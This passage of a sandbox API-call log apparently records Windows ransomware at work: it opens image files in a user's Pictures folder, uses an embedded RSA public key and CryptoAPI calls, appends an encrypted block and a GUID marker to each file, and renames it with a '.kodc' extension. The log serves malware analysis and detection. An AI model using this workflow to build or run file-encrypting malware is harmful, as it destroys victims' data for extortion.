RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af10 [0099.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x6868a0 [0099.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x655be8 [0099.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6868a0 | out: hHeap=0x630000) returned 1 [0099.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x6868a0 [0099.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a520 | out: hHeap=0x630000) returned 1 [0099.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecb0 [0099.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af28 | out: hHeap=0x630000) returned 1 [0099.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af28 [0099.527] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc14, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.527] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.527] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.527] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.528] CloseHandle (hObject=0x5cc) returned 1 [0099.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0099.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0099.537] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fUPXPZWHl.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fupxpzwhl.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\fUPXPZWHl.gif.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\fupxpzwhl.gif.kodc")) returned 1 [0099.539] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3afeb10, ftCreationTime.dwHighDateTime=0x1d5b9fc, ftLastAccessTime.dwLowDateTime=0x674a96b0, ftLastAccessTime.dwHighDateTime=0x1d5b89f, ftLastWriteTime.dwLowDateTime=0x674a96b0, ftLastWriteTime.dwHighDateTime=0x1d5b89f, nFileSizeHigh=0x0, nFileSizeLow=0x742f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="g rH3yFllhG.gif", cAlternateFileName="GRH3YF~1.GIF")) returned 1 [0099.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.539] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\g rH3yFllhG.gif") returned=".gif" [0099.539] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\g rH3yFllhG.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\g rh3yfllhg.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.539] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=29743) returned 1 [0099.539] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.542] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x7409, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.543] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.543] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.544] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x742f, lpOverlapped=0x0) returned 1 [0099.544] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.544] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.544] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.544] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.544] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.545] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.545] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.545] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.545] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.545] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.545] GetLastError () returned 0x0 [0099.545] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.545] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.546] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.546] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.546] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7430) returned 0x9ba6d90 [0099.546] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.546] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bba8 [0099.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aef8 [0099.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bbf0 [0099.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0099.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af10 [0099.546] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af28 [0099.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.547] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af28 | out: hHeap=0x630000) returned 1 [0099.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0099.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331af28 [0099.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331af10 [0099.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0099.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0099.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0099.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.547] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.547] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af28 | out: hHeap=0x630000) returned 1 [0099.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.548] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.548] GetCurrentThreadId () returned 0x42c [0099.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba56a8 [0099.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.548] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.549] GetCurrentThreadId () returned 0x42c [0099.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.549] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a568 [0099.549] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af10 [0099.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0099.550] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.550] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af28 [0099.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a5b0 [0099.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a520 [0099.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655be8 [0099.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x655c00 [0099.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.551] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x6868a0 [0099.551] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655c00 | out: hHeap=0x630000) returned 1 [0099.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x655c00 [0099.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x655be8 | out: hHeap=0x630000) returned 1 [0099.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0099.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331af10 | out: hHeap=0x630000) returned 1 [0099.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331af10 [0099.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.552] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.552] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a568 | out: hHeap=0x630000) returned 1 [0099.553] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x742f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.553] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.553] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.553] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.553] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.554] CloseHandle (hObject=0x5cc) returned 1 [0099.555] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\g rH3yFllhG.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\g rh3yfllhg.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\g rH3yFllhG.gif.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\g rh3yfllhg.gif.kodc")) returned 1 [0099.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0099.556] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.556] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.557] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.557] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfae9b0b0, ftCreationTime.dwHighDateTime=0x1d5c0f4, ftLastAccessTime.dwLowDateTime=0xebdf6d00, ftLastAccessTime.dwHighDateTime=0x1d5bef9, ftLastWriteTime.dwLowDateTime=0xebdf6d00, ftLastWriteTime.dwHighDateTime=0x1d5bef9, nFileSizeHigh=0x0, nFileSizeLow=0x10bcf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="G39vaCnIqVU1.bmp", cAlternateFileName="G39VAC~1.BMP")) returned 1 [0099.557] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\G39vaCnIqVU1.bmp") returned=".bmp" [0099.557] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\G39vaCnIqVU1.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\g39vacniqvu1.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0099.558] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=68559) returned 1 [0099.558] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.562] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10ba9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.562] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.563] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.563] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.563] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: 